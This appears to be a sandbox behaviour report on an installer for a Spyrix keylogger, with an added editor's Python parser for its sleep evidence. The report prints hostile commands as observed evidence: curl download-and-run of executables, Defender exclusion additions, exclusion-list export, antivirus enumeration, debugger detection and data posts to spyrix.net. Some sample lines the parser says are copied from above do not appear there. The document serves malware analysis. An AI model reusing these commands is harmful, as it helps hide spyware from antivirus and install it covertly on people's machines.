Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 908 Thread sleep count: 2577 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1872 Thread sleep count: 7275 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3568 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1824 Thread sleep count: 2438 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888 Thread sleep count: 7317 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5728 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5216 Thread sleep count: 2311 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208 Thread sleep count: 7705 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208 Thread sleep count: 1758 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2768 Thread sleep count: 5860 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096 Thread sleep count: 3819 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712 Thread sleep count: 6868 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180 Thread sleep count: 2845 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384 Thread sleep count: 7870 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616 Thread sleep count: 1772 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4024 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572 Thread sleep count: 7871 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5932 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572 Thread sleep count: 1569 > 30
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe TID: 7112 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6684 Thread sleep count: 145 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6012 Thread sleep count: 52 > 30
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (17 occurrences)
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0040AC68 FindFirstFileW,FindClose, 56_2_0040AC68
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW, 56_2_0040A700
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_033775E8 FindFirstFileA, 56_2_033775E8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_033776C4 FindFirstFileA,GetLastError, 56_2_033776C4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_033760F2 GetSystemInfo, 56_2_033760F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (11 occurrences)
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe File opened: C:\Users\user
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe File opened: C:\Users\user\AppData
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: spkl.exe, 00000038.00000002.2726762987.000000000176E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
Source: spmm.exe, 0000004D.00000002.2674132311.00000000007BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volum
Source: svchost.exe, 00000008.00000002.2690358497.0000027405654000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2679298985.000002740002B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: curl.exe, 0000000E.00000003.1613409560.0000000002D40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613488405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: spmm.exe, 0000004D.00000002.2674132311.00000000007BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: NETSTAT.EXE, 00000043.00000002.2458572520.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
Source: [space]= .exe, 00000007.00000002.1804315913.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1867265165.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2582806090.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607715757.0000000001698000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2615599074.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, spmm.exe, 0000004D.00000002.2674132311.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658435418.0000000000E18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: spkl.exe, 00000038.00000002.2691175840.0000000001484000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: @@IdPORT_vmnet
Source: curl.exe, 00000006.00000003.1548833142.000001CE89185000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
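The sleep evidence above mixes two different things, and the figures make the split visible. Every powershell.exe "Thread sleep time" total (1844674407370954, 2767011611056431, 3689348814741908, 4611686018427385, 5534023222112862) is an exact multiple of 922337203685477, the value that the spkl.exe entry and every "Thread delayed" line carry on their own. 922337203685477 is 2^63 hundred-nanosecond ticks divided by 10^4, i.e. the relative timeout an INFINITE wait turns into, so those lines count blocked worker threads rather than a deliberate stall; that reading is the editor's, the report does not state it. The "Thread sleep count" lines are polling loops, and the two timeout.exe entries presumably belong to the `timeout 20` and `timeout 6` commands in the process list further down. The parser below is an added example by the editor, not code from the report or from the sample; it re-parses lines in the report's own format (the constructed sample is copied from the evidence above) and totals them per process image.

```python
"""Added example (editor's code, not part of the sandbox report or the sample):
totals "Thread sleep" / "Thread delayed" evidence per process image and separates
blocked (INFINITE) waits from timed stalls and polling loops."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Assumption (editor's reading, not stated by the report): 922337203685477 is
# 2**63 hundred-nanosecond ticks rendered in milliseconds, the relative timeout
# an INFINITE wait becomes, so an exact multiple of it is a number of blocked
# threads rather than a timed delay.
INFINITE_UNIT = (2 ** 63) // 10_000  # 922337203685477

SLEEP_RE = re.compile(
    r"^Source: (?P<image>.+?) TID: \d+ Thread sleep "
    r"(?P<kind>time|count): (?P<value>-?\d+)s? >=? -?\d+s?$"
)
DELAY_RE = re.compile(r"^Source: (?P<image>.+?) Thread delayed: delay time: (?P<value>\d+)")

# Constructed sample: lines copied from the evidence above.
SAMPLE = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4668 Thread sleep count: 7496 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4024 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe TID: 7112 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6684 Thread sleep count: 145 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6012 Thread sleep count: 52 > 30
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Thread delayed: delay time: 922337203685477
"""


def classify(line):
    """Map one evidence line to (image, category, units), or None if it is not one.

    category: 'infinite' (units = number of INFINITE waits),
              'timed'    (units = printed magnitude of a finite delay),
              'loop'     (units = number of short sleeps from a 'sleep count' line).
    """
    m = SLEEP_RE.match(line)
    if m and m["kind"] == "count":
        return PureWindowsPath(m["image"]).name, "loop", int(m["value"])
    if not m:
        m = DELAY_RE.match(line)
    if not m:
        return None
    image = PureWindowsPath(m["image"]).name
    magnitude = abs(int(m["value"]))
    if magnitude % INFINITE_UNIT == 0:
        return image, "infinite", magnitude // INFINITE_UNIT
    return image, "timed", magnitude


def triage(report_text):
    """Per-image totals: {image: {'infinite': n, 'timed': n, 'loop': n}}."""
    totals = defaultdict(lambda: {"infinite": 0, "timed": 0, "loop": 0})
    for line in report_text.splitlines():
        hit = classify(line.strip())
        if hit:
            image, category, units = hit
            totals[image][category] += units
    return dict(totals)


def stalling_candidates(totals):
    """Images whose sleeps are not explained by blocked threads alone."""
    return sorted(img for img, t in totals.items() if t["timed"] or t["loop"])


if __name__ == "__main__":
    result = triage(SAMPLE)
    for image, t in sorted(result.items()):
        print(f"{image:<16} infinite={t['infinite']} timed={t['timed']} loop={t['loop']}")
    print("worth a closer look:", stalling_candidates(result))
```

On the sample the six powershell.exe "sleep time" units collapse to six blocked threads and the only residue is its polling loop, while spkl.exe contributes a single blocked wait; with the real report pasted in, the function call is the same.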

Anti Debugging

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0339B8B0 rdtsc 56_2_0339B8B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (11 occurrences)
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_0036119B SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,exit, 71_2_0036119B
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown (7 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
